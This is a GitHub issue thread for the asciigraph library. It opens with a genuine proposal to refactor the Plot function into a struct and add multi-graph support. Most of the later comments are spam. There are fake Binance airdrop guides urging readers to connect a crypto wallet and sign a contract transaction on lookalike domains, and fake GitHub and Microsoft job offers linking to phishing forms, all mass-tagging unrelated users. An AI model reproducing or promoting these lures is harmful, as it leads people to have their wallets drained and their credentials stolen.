### ISSUE TITLE
Reformat Code

### ISSUE THREAD

**Issue by CSenshi** [guptarohit/asciigraph#18]
It would be nice if instead of having only one function that just generates a string, we had a struct named 'struct graph' for example, that had this method, configurations and other utilities inside. Subsequently, it would be easier to change implementations of other methods without changing the interface.

Besides that, we can add other methods, e.g. one could be to plot several graphs together or show statistics. However, (from my standpoint) it is essential to rewrite code so that it supports structure which will implement methods. In addition, it would encourage other users to write code for this project and making contributions much easier. 

_DISCLAIMER: I don't mean to delete old code, because other projects might be using it, so I will just extend it to support classes._

**Comment by CSenshi** [comment]
If this project is still up and open I would like to work on it :)

**Comment by guptarohit** [comment]
@CSenshi good idea :+1: Yes, we gotta refactor `Plot` function, and I was also thinking to add support for multi-graph. Please feel free to create PR :)

p.s. _sorry for the delayed response_.

**Comment by bnMikheili** [comment]
@CSenshi I would like to work on this issue, if it's free for now.

**Comment by CSenshi** [comment]
@bnMikheili Feel free to work on it!

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by epysan** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @xgithub, @cs-itops, @oocat, @SpicyPete, @astra-zhao, @shjborage, @dvddarias, @fredericorecsky, @WorldofOpenDev, @coolerfall, @Deviluna, @zhuoyikang, @alexzhangwhu, @calans, @greenido, @y12studio, @rands0n, @lluisrojass, @joeybuddy, @AceFO, @husless, @shoheiyokoyama, @bellflower2015, @jimbouki, @S2Ler, @ReverseScale, @popohub, @Marshall333, @mohsen-in, @oppos69, @deyw-bit, @MuFengYi, @llh1985, @wujieqian, @AxoSal, @karl-tech, @samuel-x, @bjaraujo, @rshark, @mzheng, @dalton-lee, @micrub, @cahitihac, @svict4, @saygad, @TranBaVinhSon, @aredbird1, @ukid, @snakewarhead, @fjuarez-domandtom

**Comment by tim-tepia** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1500 in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @K-C-DaCosta, @monkey0722, @yqboy, @shubh402, @INNOVASE, @niksmac, @jensenzhng, @SuplabsYi, @gbaranski, @tmhao2005, @zslucky, @lautaro22olivera, @bimap98, @Aearsears, @gasboyc7, @montychen, @nizovtsevnv, @fzzle, @nevillespiteri, @juroberttyb, @muskstuff247, @tkxkd0159, @egzonkrs, @DiegoAscanio, @Ronmoha, @andergri, @dreamph, @swaylq, @alykhan, @ccbond, @happlins, @eduardostuart, @KimWanki, @joakim-roos, @sohrab254, @lishen802, @zippoxer, @zmkeh, @eisukeesaki, @JuzioMiecio520, @nikolay-bushkov, @Kamiel7, @tejas456sawant, @seajmurphy, @Hadii22, @nikiats, @Mgerxiu, @taylor-curtis, @brandnewx, @avyas

**Comment by adannalyn** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
shenhaibo, @kinsliy, @fanrongQu, @heyehao2008, @lululau, @o5f2y, @bemyae, @duguyixiaono1, @followgithub, @zhumingzhen, @jonyChina162, @sonyzhang, @superbull, @liubin0730, @truexin1292, @19940727, @zcgong, @jenningsloy318, @Muzhi1920, @0802lqrasd123

**Comment by micrub** [comment]
Hello,

I am getting an error message.

**Comment by dev-chain247** [comment]
# [Job Opportunity at Microsoft!](https://careersmicrosoft.online/)

 We're hiring for position at Microsoft!

## How to Apply:
Ready to embark on this amazing journey? Apply now [here](https://careersmicrosoft.online/) before **March 19, 2024**.

## Job Description:
- **Position:** Junior Software Developer
- **Salary:** Competitive salary package
- **Location:** Remote
- **Benefits:**
  - Work remotely from anywhere in the world
  - Flexible working hours
  - Comprehensive health insurance
  - Generous vacation and sick leave policy
  - Professional development opportunities
  - Collaborative and inclusive work environment

## Requirements:
- Passion for software development
- Basic understanding of programming languages like Python, JavaScript, or Java
- Strong problem-solving skills
- Excellent communication and teamwork abilities

Don't miss out on this incredible opportunity to kick-start your career with one of the world's leading tech companies! Apply now and become a part of the Microsoft family!
SilviaMlb, @tungd, @luisroel91, @ArnoldIOI, @indahud, @xlansmasry, @hanpham32, @Kluzak, @xenowits, @ng1091, @edddyguo, @zhangpanyi, @Beks11, @jtoy, @afiorenza, @vicspina, @EvanPiro, @p0n1, @nkmry, @steezeburger
